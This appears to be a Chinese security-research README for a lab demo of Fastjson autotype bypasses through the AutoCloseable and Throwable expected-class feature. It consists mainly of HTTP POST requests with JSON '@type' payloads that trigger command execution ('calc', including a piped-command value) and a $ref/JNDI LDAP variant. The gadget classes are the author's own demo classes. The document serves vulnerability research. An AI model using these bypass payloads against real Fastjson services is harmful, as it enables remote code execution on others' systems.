fastjson因为exceptClass期望类的特性导致可以通过AutoCloseable和Throwable绕过autotype。
运行org.chabug.fastjson.DemoApplication
,访问http://localhost:8082/json
AutoCloseable绕过
POST /parseObject HTTP/1.1
Host: test.local:8082
Connection: close
Content-Type: application/json
Content-Length: 131
{
"@type":"java.lang.AutoCloseable",
"@type": "org.chabug.fastjson.exploit.ExecCloseable",
"domain": "y4er.com | calc"
}
Throwable绕过
POST /parseObject HTTP/1.1
Host: test.local:8082
Connection: close
Content-Type: application/json
Content-Length: 127
{
"@type":"java.lang.Exception",
"@type": "org.chabug.fastjson.exploit.ExecException",
"domain": "y4er.com | calc"
}
拓展AutoCloseable绕过 Runnable
POST /parseObject HTTP/1.1
Host: test.local:8082
Connection: close
Content-Type: application/json
Content-Length: 174
{
"@type":"java.lang.AutoCloseable",
"@type": "org.chabug.fastjson.exploit.ExecRunnable",
"eval":{"@type":"org.chabug.fastjson.exploit.EvalRunnable","cmd":"calc"}
}
Readable
POST /parseObject HTTP/1.1
Host: test.local:8082
Connection: close
Content-Type: application/json
Content-Length: 174
{
"@type":"java.lang.AutoCloseable",
"@type": "org.chabug.fastjson.exploit.ExecReadable",
"eval":{"@type":"org.chabug.fastjson.exploit.EvalReadable","cmd":"calc"}
}
使用$ref拓展攻击面,使用parse()解析的也能触发任意getter。来自于@threedr3am 师傅
POST /parse HTTP/1.1
Host: php.local:8082
Connection: close
Content-Type: application/json
Content-Length: 159
{
"@type":"java.lang.AutoCloseable",
"@type": "org.chabug.fastjson.exploit.RefAnyGetterInvoke",
"resourceName":"ldap://localhost:1389/Calc",
"instance":{"$ref":"$.instance"}
}
用到的org.chabug.fastjson.exploit.ExecException
和org.chabug.fastjson.exploit.ExecCloseable
都是我自己写的,在其getter中实现了Runtime.getRuntime().exec()
,真正要利用还是得自己找到可用的gadget。
另外浅蓝师傅、Kingkk师傅以及l1nk3r师傅的文章中已经说的很明白了,走JNDI注入困难,找找写文件什么的还行,我也还在寻找gadget的过程中,欢迎师傅们加我一起交流。
- https://github.com/iSafeBlue/fastjson-autotype-bypass-demo
- https://b1ue.cn/archives/348.html
- https://b1ue.cn/archives/382.html
- 浅谈下Fastjson的autotype绕过
- https://forum.90sec.com/t/topic/1115